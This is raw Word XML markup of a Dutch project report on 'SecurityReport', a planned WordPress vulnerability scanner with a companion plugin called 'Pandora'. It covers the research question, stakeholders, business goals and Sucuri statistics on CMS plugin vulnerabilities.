                    <w:p w14:paraId="705D2905" w14:textId="546C1FEB" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">Op basis van deze hoofdvraag ben ik op onderzoek uitgegaan om beter te begrijpen wat een webapplicatie scanner is en hoe de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> gebruikers er mee hun websites kunnen scannen. In ben tot de conclusie gekomen dat het meest gangbare is om een </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">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w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Freemium</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>. Om dat het systeem een gratis gelimiteerde versie aanbiedt.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253180928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="616B4B77" wp14:editId="7AD3C84F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3168015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1219200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3112135" cy="1945640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="754" name="Text Box 754"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="31121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FF6CD" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">
                            <w:r>
                              <w:t xml:space="preserve">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6" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:249.45pt;margin-top:96pt;width:245.05pt;height:153.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TQnsCAABm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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32EFF6CD" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">Het onderzoek, concept ontwikkeling en het ontwikkelen van de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Proof</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> of Concept heeft vormgegeven aan twee subsystemen de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> extensie en de webapplicatie scanner. Het gehele systeem heeft de naam SecurityReport gekregen en de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> extensie heeft de naam Pandora. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2D5B883C" w14:textId="3ADBF389" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">SecurityReport en Pandora werken samen om de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> gebruiker een gebruikersvriendelijke ervaring te bieden bij het aanvragen van een scan tot aan het ontvangen van het rapport. </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>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0E3238" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238" w:rsidP="006E0461">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>“</w:t>
                      </w:r>
                      <w:r w:rsidRPr="006E0461">
                        <w:rPr>
                          <w:i/>
                        </w:rPr>
                        <w:t xml:space="preserve">Hoe kan ik een MVP van een geautomatiseerde webapplicatie scanner ontwikkelen, die kwetsbaarheden identificeert van </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="006E0461">
                        <w:rPr>
                          <w:i/>
                        </w:rPr>
                        <w:t>Wordpress</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="006E0461">
                        <w:rPr>
                          <w:i/>
                        </w:rPr>
                        <w:t xml:space="preserve"> website en op basis daarvan een rapport genereert, waar de klanten van S5 gratis gebruik van kunnen maken?</w:t>
                      </w:r>
                      <w:r>
                        <w:t>”</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="787C0AB2" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E3ABE" w14:textId="77777777" w:rsidR="00120248" w:rsidRPr="00A248C1" w:rsidRDefault="00120248" w:rsidP="00A248C1">
      <w:pPr>
        <w:sectPr w:rsidR="00120248" w:rsidRPr="00A248C1" w:rsidSect="00151A15">
          <w:headerReference w:type="default" r:id="rId21"/>
          <w:headerReference w:type="first" r:id="rId22"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="3" w:name="_Toc496292412"/>
    <w:p w14:paraId="7E076231" w14:textId="347118C3" w:rsidR="00EF3E0F" w:rsidRDefault="00DD4614" w:rsidP="00EF3E0F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-1417"/>
        <w:sectPr w:rsidR="00EF3E0F" w:rsidSect="00151A15">
          <w:headerReference w:type="first" r:id="rId23"/>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709"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548CE35E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-1026795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-602615</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10855255" cy="7548115"/>
                <wp:effectExtent l="0" t="0" r="16510" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="471" name="Rectangle 471"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="10855255" cy="7548115"/>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7BF3" id="Rectangle 471" o:spid="_x0000_s1026" style="position:absolute;margin-left:-80.85pt;margin-top:-47.4pt;width:854.75pt;height:594.3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0E3238" w:rsidRPr="007B37A9" w:rsidRDefault="000E3238"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3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AXVVfAIAAGYF&#10;AAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCEYU0n4AAA&#10;AAsBAAAPAAAAAAAAAAAAAAAAANQEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA4QUA&#10;AAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="030DFEE0" w14:textId="17FE7127" w:rsidR="000E3238" w:rsidRPr="007B37A9" w:rsidRDefault="000E3238"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3"/>
    </w:p>
    <w:bookmarkStart w:id="4" w:name="_Toc496292413"/>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1F710"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4"/>
    </w:p>
    <w:p w14:paraId="505B3C8B" w14:textId="4FD63692" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc496292414"/>
      <w:r>
        <w:t>1.1 aanleiding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>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rsidR="00EC208C">
        <w:t>,</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6" w:name="_Toc496292415"/>
      <w:r w:rsidRPr="00DA758E">
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Probleemstelling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>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4E450BF1" w:rsidR="00581B17" w:rsidRDefault="00CA3133" w:rsidP="00EE0925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc496292416"/>
      <w:r>
        <w:t>Business leads en gratis scan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>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80D85"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077D1592" w:rsidR="006822D8" w:rsidRPr="009D389F" w:rsidRDefault="005810B6" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E51AA4">
        <w:t>Tabel 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E5638E" w14:textId="04335A25" w:rsidR="006B3C0E" w:rsidRDefault="005810B6" w:rsidP="006822D8">
      <w:r>
        <w:t>In tabel</w:t>
      </w:r>
      <w:r w:rsidR="008D7A45">
        <w:t xml:space="preserve"> 1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> 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891E"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4D9071B6" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc496292417"/>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="006D01D5">
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="1DCE00BE" w14:textId="5B10B25F" w:rsidR="00871F63" w:rsidRDefault="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bookmarkStart w:id="9" w:name="_Toc496292418"/>
    <w:p w14:paraId="02B62503" w14:textId="25B2299A"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3343B"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bookmarkEnd w:id="9"/>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10" w:name="_Toc496292419"/>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1C80"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bookmarkEnd w:id="10"/>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Proof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ordPress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241096">
          <w:headerReference w:type="default" r:id="rId25"/>
          <w:headerReference w:type="first" r:id="rId26"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:t>Hoe ziet het eindproduct eruit?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6CB452" w14:textId="04DF0009" w:rsidR="00682377" w:rsidRDefault="001F0774" w:rsidP="0042566C">
      <w:pPr>
        <w:ind w:left="-1417"/>
        <w:sectPr w:rsidR="00682377" w:rsidSect="00241096">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81856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C1D1714" wp14:editId="0D11C332">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-962025</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-60452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435F" id="Rectangle 569" o:spid="_x0000_s1026" style="position:absolute;margin-left:-75.75pt;margin-top:-47.55pt;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" fillcolor="#70ad47" strokecolor="#70ad47" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A14BEE">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>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0E3238" w:rsidRPr="00A14BEE" w:rsidRDefault="000E3238"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3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NK3w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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="153D4CE9" w14:textId="2395DAFC" w:rsidR="000E3238" w:rsidRPr="00A14BEE" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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" filled="f" stroked="f" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5895D7E0" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00435E58" w:rsidRDefault="000E3238"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7A111416">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0EE99"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p>
    <w:bookmarkStart w:id="11" w:name="_Toc496292420"/>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2492A39A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-916131</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-3317275</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7C291" id="Rectangle 567" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.15pt;margin-top:-261.15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11"/>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2" w:name="_Toc496292421"/>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00FA5E1D">
        <w:t xml:space="preserve">Stakeholders en </w:t>
      </w:r>
      <w:r>
        <w:t>Business doelen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>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3" w:name="_Toc496292422"/>
      <w:r>
        <w:t xml:space="preserve">2.1.1 </w:t>
      </w:r>
      <w:r w:rsidR="000A3B05">
        <w:t>Stakeholders</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>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6C1F8F02">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-909781</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1142148</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44DF" id="Rectangle 49" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.65pt;margin-top:-89.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34E5EAC9"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w:t>
      </w:r>
      <w:r w:rsidR="002A38E3">
        <w:t xml:space="preserve"> het goedkeuren van userpoints</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bookmarkStart w:id="14" w:name="_Toc496292423"/>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7E8D3"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4"/>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5"/>
        <w:tblW w:w="9773" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1789"/>
        <w:gridCol w:w="4393"/>
        <w:gridCol w:w="3591"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B7C65" w14:paraId="09C636CA" w14:textId="77777777" w:rsidTr="002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2B7C65">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Doel Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193E8BDF"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2B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2B7C65">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00503AB1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Service aanbod uitbreiden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270CC81D"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2B7C65">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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>AI: S5 wilt de klanten een tool aanbieden om hun websites te scannen op security</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="26FA34F0"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2B7C65">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2B7C65">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Het servicekwaliteit verbeteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA49253" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRPr="007868ED" w:rsidRDefault="002B7C65" w:rsidP="002B7C65">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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>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CA49A8">
                  <w:pPr>
                    <w:framePr w:hSpace="180" w:wrap="around" w:vAnchor="text" w:hAnchor="page" w:x="1510" w:y="5"/>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:sz w:val="24"/>
                    </w:rPr>
                    <w:t>AI: S5 wilt de klanten meer overzicht bieden op de security van hen webshops</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="44B5FC86" w14:textId="77777777" w:rsidR="002B7C65" w:rsidRDefault="002B7C65" w:rsidP="002B7C65">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29DC7878" w:rsidR="00272E09"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624FC"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r w:rsidR="00272E09"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7FAA5C8E" w:rsidR="001473B4" w:rsidRDefault="00BA29E1">
                  <w:r>
                    <w:t>Een Client applicatie voor de klant</w:t>
                  </w:r>
                  <w:r w:rsidR="00F74324">
                    <w:t xml:space="preserve"> wat dient als</w:t>
                  </w:r>
                  <w:r w:rsidR="00B52E66">
                    <w:t xml:space="preserve"> Endpoint</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7989982A" w14:textId="5DCCFB45" w:rsidR="00D12EE6" w:rsidRDefault="002B7C65">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621FD09F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-908685</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-916131</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B9C5" id="Rectangle 448" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.55pt;margin-top:-72.1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2"/>
        <w:gridCol w:w="3094"/>
        <w:gridCol w:w="2015"/>
        <w:gridCol w:w="1685"/>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68"/>
            </w:tblGrid>
            <w:tr w:rsidR="005653E3" w14:paraId="4F3420DB" w14:textId="77777777" w:rsidTr="00195C12">
              <w:trPr>
                <w:trHeight w:val="627"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5556" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7A66A77B" w14:textId="20A61BD3" w:rsidR="005653E3" w:rsidRDefault="005653E3" w:rsidP="008B56CF">
                  <w:r>
                    <w:t>Een Client applicatie voor de klant wat di</w:t>
                  </w:r>
                  <w:r w:rsidR="007C0957">
                    <w:t>ent als Endpoint.</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6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7720477E" w:rsidR="009004E6" w:rsidRPr="009004E6" w:rsidRDefault="006A5AE7" w:rsidP="00971D60">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc496292424"/>
      <w:r>
        <w:t>2.2 Doelgroep</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>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003AC1D4" w:rsidR="001428EA" w:rsidRDefault="00FE7016" w:rsidP="001D4CC8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc496292425"/>
      <w:r>
        <w:t xml:space="preserve">2.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00CE1951">
        <w:t>Wordpress op gebied van security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3E1A0FC4" w14:textId="77777777" w:rsidR="001D4CC8" w:rsidRPr="001D4CC8" w:rsidRDefault="001D4CC8" w:rsidP="001D4CC8"/>
    <w:p w14:paraId="282AA586" w14:textId="6243EC70"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129E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sbaarheden komt niet af van de Kern van WordPress maar van de WordPress plugins. De WordPress plugins rekenen vo</w:t>
      </w:r>
      <w:r w:rsidR="00330FA9">
        <w:t>or 52% van alle kwetsbaarheden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6351A091" w14:textId="3BE2ED53" w:rsidR="00B84DAB" w:rsidRPr="009B46E2" w:rsidRDefault="00484743" w:rsidP="009B46E2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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C4F3C"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E0DA0EA" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Er zijn ongeveer</w:t>
      </w:r>
      <w:r w:rsidR="00C942D8">
        <w:t xml:space="preserve"> 1 miljard websites online en het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aantal blijft maar stijgen. De kracht achter deze stijging  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 Ocean een geautomatiseerde CMS installatie aan. De explosie van CSM technologieën heeft ervoor gezorgd dat een derde van alle websites aangedreven door zulke soort CMS applicaties. Wordpress leidt met 60% op de CMS markt en heeft dus de grootste marktaandeel. Andere CMS platforms concentreren zich meer op niche markten zoals Magento voor e-commerce en Drupal voor grote bedrijfssystemen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901250E" w14:textId="1F141215" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Elke particulier kan een host en domein kopen en daar een WordPress, Magento of Drupal instantie op instaleren. Sucuri noemt dit fenomeen User A</w:t>
      </w:r>
      <w:r w:rsidRPr="0087653F">
        <w:t>doption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, dit zorgt ervoor er een grote vloed aan ongeschoolde webmasters en service providers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2FBABA0F" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t xml:space="preserve">Voor het eerste kwartaal van 2016 heeft Sucuri een aantal CMS platformen geanalyseerd op kwetsbaarheden binnen het systeem. Het resultaat van Sucuri’s laat zien dat de drie meest geïnfecteerde CMS platformen zijn WordPress, Joombla en Magento. Tijdens de kwetsbaarheid analyse is er meer naar de installatie, configuratie, en algemene onderhoudt door de webmasters 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1FDA2032" w14:textId="3CEF9D42" w:rsidR="009B46E2" w:rsidRPr="009B46E2" w:rsidRDefault="00F27A73" w:rsidP="00B84DAB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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04C03"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1747EA2E" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t xml:space="preserve">CMS platformen moedigen software ontwikkelaars aan om extensies te maken om nieuwe features aan de systemen toe te voegen. Maar wat de CMS platformen niet willen zijn extensies met kwetsbaarheden, jammer genoeg is hier niet voldoende zicht op en wordt er niet veel aan kwaliteit controle gedaan. Dit zorgt ervoor dat de meeste kwetsbaarheden te vinden zijn in extensies. Er kunnen kwetsbaarheden te vinden zijn in de kern van de CMS systemen maar, deze zijn nog te onderhouden door het uitgeven van patches, mits de webmaster de CMS systeem niet up-to-date houdt. Extensies kunnen door iedereen met een beetje software ontwikkeling kennis gemaakt worden. De security problemen ontstaan wanneer ongeschoolde, onervaren software ontwikkelaars zwak beveiligde software vrijgeven als CMS extensies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57316FC5" w14:textId="5EC2AC17" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t xml:space="preserve">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e plugin RevSlider. De security probleem doet zich voor in de Premium versie van de RevSlider. De kwetsbaarheid zorgt ervoor dat hackers elk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technieken SQL Injecties en XSS aanvallen om administratie accounts toe te voegen aan het systeem.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E99BB8D" w14:textId="650B32A3" w:rsidR="00B84DAB" w:rsidRDefault="00B84DAB" w:rsidP="00B84DAB">
      <w:r>
        <w:t>Zoals nu duidelijk is zijn de extensies de meest voorkomende bron van kwetsbaarheden maar niet de enige. Het security probleem waar Sucuri naar refereert als Out-of-date is een al sinds dat de eerste stukje onbeveiligde code een dreiging voor de website. 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241096">
          <w:headerReference w:type="default" r:id="rId29"/>
          <w:headerReference w:type="first" r:id="rId30"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440"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69F19E31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10732135" cy="742931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32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10732788" cy="7429769"/>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387AA50">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10668635" cy="7429317"/>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33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10668635" cy="7429317"/>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241096">
          <w:headerReference w:type="first" r:id="rId34"/>
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
